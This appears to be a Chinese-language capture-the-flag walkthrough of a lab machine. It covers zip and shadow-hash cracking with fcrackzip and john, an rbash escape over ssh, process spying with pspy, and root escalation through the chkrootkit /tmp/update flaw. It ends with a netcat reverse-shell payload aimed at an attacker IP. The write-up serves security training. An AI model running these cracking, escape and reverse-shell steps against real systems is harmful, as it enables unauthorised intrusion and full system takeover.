常规端口扫描,有22,80
解密压缩文件
有个.zip文件
wget http://192.168.190.85/save.zip
unzip save.zip需要密码
利用fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u save.zip 破解 密码manuel
或者
# 利用zip2john将zip转换 zip2john save.zip → password.hash #
利用john离线破译hash的zip密码 john --wordlist=/usr/share/wordlists/rockyou.txt password.hash
看shadow可以得到加密的密码
# 利用echo变成hash方便暴力破解 echo '296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::' > passwd.txt # 利用john离线破译txt密码 john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
得到了密码 server
绕过rbash(ssh)
有rbash
简单枚举一下,基本可以绕过的命令都没有
用ssh 用户名@IP -t "bash --noprofile"绕过 记得添加环境变量才可以
# ssh登录之后获取环境变量 echo $PATH
# 重写环境变量 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
提权枚举
这个文件有点可疑
运行一下
5有交互但是看不到
系统会通知我们扫描将在 60 秒内启动。这暗示有一个正在运行的进程,我们可能想要仔细研究
Pspy
Pspy是一个命令行工具,用于在不需要root权限的情况下窥探进程。它允许您在其他用户运行的命令、cron任务等执行时查看它们。该工具通关循环遍历/proc下的值来获取进程参数信息。
wget https://github.com/DominicBreuker/pspy.git
kali:sudo python3 -m http.server 80
靶机:
wget http://192.168.45.194:80/pspy64
chmod +x pspy64
./pspy64
发现执行了/bin/sh /root/chkrootkit-0.49/chkrootkit
chkrootkit提权
searchsploit chkrootkit
仔细查看说在/tmp
下放置一个update
的文件会以root
权限运行
那么构造一个恶意的update
可以让我权限提升
echo "/usr/bin/nc -e /bin/sh 192.168.44.143 4444" > /tmp/update
chmod 777 update
./upadte
kali监听